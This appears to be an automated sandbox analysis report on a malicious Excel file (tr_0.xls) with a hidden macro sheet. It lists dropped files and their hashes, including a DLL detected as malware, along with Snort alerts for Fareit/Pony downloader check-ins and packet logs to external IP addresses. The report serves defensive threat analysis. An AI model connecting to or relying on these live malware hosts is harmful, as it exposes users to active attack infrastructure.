                                                                                                                                      Preview: Desktop.LNK=0..[xls]..tr_0.LNK=0..tr_0.LNK=0..[xls]..tr_0.LNK=0..
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tr_0.LNK
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jun 11 07:46:57 2020, mtime=Tue Jul 14 08:20:23 2020, atime=Tue Jul 14 08:20:23 2020, length=92672, window=hide
                                                                                                                                      Size (bytes):960
                                                                                                                                      Entropy (8bit):4.518547725377104
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:B5F219236647C9E17EC9167134F2EA42
                                                                                                                                      SHA1:2B6804594C199C961E95B7EBA65135EB0995A07E
                                                                                                                                      SHA-256:230E339083AC0A3D523FE99809B9BFB44D10466F33877CF819DC79CEE9BBBA9C
                                                                                                                                      SHA-512:676C3191C99839FA6F35D933C4F94BDC4971A92CFA7F399AE65BB72550AA53402CC555DA1DA41E2E86CCCCA732E4618898386E53C4B7B36AB7A72B914A18E612
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: L..................F.... .....u..?..V....Y..V....Y...j......................\.Z.2..h...PtJ .tr_0.xls..B.......P.E.PtJ.... .........................t.r._.0...x.l.s.......M...............-.......L...........m..Z.....C:\Users\user\Desktop\tr_0.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.t.r._.0...x.l.s.`.......X.......841618..............x..C..Z.;....c...............x..C..Z.;....c...........E.......9...1SPS..mD..pH.H@..=x.....h....H....X/:......`"................L..................F.... .....u..?..V....Y..V....Y...j......................\.Z.2..h...PtJ .tr_0.xls..B.......P.E.PtJ.... .........................t.r._.0...x.l.s.......M...............-.......L...........m..Z.....C:\Users\user\Desktop\tr_0.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.t.r._.0...x.l.s.`.......X.......841618..............x..C..Z.;....c...............x..C..Z.;....c...........E.......9...1SPS..mD..pH.H@..=x.....h....H....X/:......`"................
                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):2.6556390622295662
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:7C2BCD8D62C7D1E49DDD33CE20876267
                                                                                                                                      SHA1:B09141445851302075E4A46F9F48998FF8695857
                                                                                                                                      SHA-256:940436D80A7A518EC2740082FFBBA23DCC0F3A5F6D25F4C9A912949DBBDC9606
                                                                                                                                      SHA-512:C67FC36383FC25401169CDFA75B9872A207C8AB8DFC0BE1A0DA4DA5E7D62B7F0720A9E09588A570780232B1176D9C547251CA26B4759D391CBF3CCBEEA1DF3F3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ....L.y.n.n.....
                                                                                                                                      C:\Users\user\Desktop\DAA20000
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                      Size (bytes):149754
                                                                                                                                      Entropy (8bit):5.674977526140447
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:BBD400DE075A1ED46A60CD8B74D48507
                                                                                                                                      SHA1:30AE35FCC89956B75A102A11F3560A0CB221558A
                                                                                                                                      SHA-256:3C2DC024916ED7C207CAA3A5CAA9190314CF36BFA12B6EAB8BD8C6B5E50A4988
                                                                                                                                      SHA-512:21FE852621C1F40D678C4D3D2582239D4A812743472143A0D5B37A8EC6CF345373AE8659E19CC630B79433CB48F6DA3F88237E55676E02BAF702A4B881F34AB6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ........ZO..........................\.p.... B.....a.........=...........................................=........I.&8.......X.@...........".......................1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1.......4........(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.1...,...6........(..C.a.l.i.b.r.i.1.......6........(..C.a.l.i.b.r.i.1.......6........(..C.a.l.i.b.r.i.1.......>........(..C.a.l.i.b.r.i.1.......4........(..C.a.l.i.b.r.i.1.......<........(..C.a.l.i.b.r.i.1.......?........(..C.a.l.i.b.r.i.1.*.h...6........(..C.a.l.i.b.r.i. .L.i.g.h.t.1................(..C.a.l.i.b.r.i.1................(..C.a.l.i.b.r.i.....
                                                                                                                                      C:\Users\user\Documents\dDdoiBj.ocx
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Size (bytes):375808
                                                                                                                                      Entropy (8bit):4.732447683360025
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:7E9C8822BE0F73073CE2CC5EF5A13C96
                                                                                                                                      SHA1:10B2F8667DB53EAF1B85A209D9B80B834425167F
                                                                                                                                      SHA-256:BD6840CC208517847E130DB0C847E715BA80A88E210E6383B37C1D0381877EE5
                                                                                                                                      SHA-512:120BFEC74EED70DC19D7AFF9ED8DC392616A6C652F4C7B3F642219C6D5203038E66CEF65E67B79041B8653B65021E2402B3CFC0F3B6850AFD1D13E2A03637118
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: Virustotal, Detection: 48%, Browse
                                                                                                                                      • Antivirus: Metadefender, Detection: 16%, Browse
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$._...........!...2."...........3.......@..........................................................................................t.......................P......................................................$...........................o................................... ..`.text........0...................... ..`.rdata.......@.......&..............@..@.rdata2. N...P...P...(..............@..@.data....3.......4...x..............@....rsrc...t...........................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Jul 12 20:50:48 2020, Last Saved Time/Date: Mon Jul 13 08:41:20 2020, Security: 0
                                                                                                                                      Entropy (8bit):5.435314060016419
                                                                                                                                      TrID:
                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                      File name:tr_0.xls
                                                                                                                                      File size:92165
                                                                                                                                      MD5:08f03e9133419730830daa1d5c05f2ea
                                                                                                                                      SHA1:0fbe4abe79048fb25f00e11c3f53b9729ea2019b
                                                                                                                                      SHA256:ee2dc4300f18802a18616e9e5434b2a0d438c819d2229d3724fa266ae881dbf7
                                                                                                                                      SHA512:d272fc170333bca041dba873120303694f99bd6f89e32b73597ad8cb6da63e54b45e1f15c34ca8494369d091693c456076374f3fb58c66ce08d1f5140e2745c1
                                                                                                                                      SSDEEP:1536:0Yyk3hbdlylKsgqopeJBWhZFGkE+cL2NdAU8enuoLf04Gq4nV/hS5vfiyrA4H9OP:0Xk3hbdlylKsgqopeJBWhZFGkE+cL2N4
                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                      Static OLE Info

                                                                                                                                      General

                                                                                                                                      Document Type:OLE
                                                                                                                                      Number of OLE Files:1

                                                                                                                                      OLE File "tr_0.xls"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:True
                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                      Encrypted Document:False
                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:False

                                                                                                                                      Summary

                                                                                                                                      Code Page:1252
                                                                                                                                      Author:
                                                                                                                                      Last Saved By:
                                                                                                                                      Create Time:2020-07-12 19:50:48
                                                                                                                                      Last Saved Time:2020-07-13 07:41:20
                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                      Security:0

                                                                                                                                      Document Summary

                                                                                                                                      Document Code Page:1252
                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                      Company:
                                                                                                                                      Contains Dirty Links:False
                                                                                                                                      Shared Document:False
                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                      Application Version:1048576

                                                                                                                                      Streams

                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                      General
                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:4096
                                                                                                                                      Entropy:0.308670293816
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . g b . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a6 00 00 00
                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                      General
                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:4096
                                                                                                                                      Entropy:0.244126493356
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \\ . . . X . . @ . . . . P . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81842
                                                                                                                                      General
                                                                                                                                      Stream Path:Workbook
                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                      Stream Size:81842
                                                                                                                                      Entropy:5.85626636623
                                                                                                                                      Base64 Encoded:True
                                                                                                                                      Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . I . & 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                      Macro 4.0 Code

                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,26551,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,173,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      07/14/20-11:20:40.204414TCP2014411ET TROJAN Fareit/Pony Downloader Checkin 24970880192.168.1.10291.218.231.226
                                                                                                                                      07/14/20-11:20:47.536647TCP2014411ET TROJAN Fareit/Pony Downloader Checkin 24971180192.168.1.10291.218.231.226

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Jul 14, 2020 11:20:24.126971960 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.191730976 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.192112923 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.193181992 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.257836103 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.407891035 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.407928944 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.407953978 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408010006 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408035994 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408061028 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408087015 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408113003 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408138037 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408149958 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.408165932 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.408343077 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.472898960 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.472948074 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.472994089 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473016977 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473072052 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473098040 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473120928 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473143101 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473165035 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473187923 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473210096 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473227024 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.473231077 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473253965 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473277092 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473299026 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473323107 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473345041 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473368883 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473391056 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473412037 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.473469973 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.474157095 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.538229942 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538316011 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538361073 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538393021 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538414001 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538434029 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538455009 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538475037 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538495064 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538516045 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538536072 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538556099 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538556099 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.538575888 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538595915 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538615942 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538635015 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538655043 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538674116 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538695097 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538723946 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538733006 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.538742065 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538762093 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538803101 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538834095 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538853884 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538875103 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538893938 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538908005 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.538913965 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538933992 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538954973 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538974047 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.538994074 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539014101 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539033890 CEST80497045.101.51.247192.168.1.102
                                                                                                                                      Jul 14, 2020 11:20:24.539036989 CEST4970480192.168.1.1025.101.51.247
                                                                                                                                      Jul 14, 2020 11:20:24.539052963 CEST80497045.101.51.247192.168.1.102
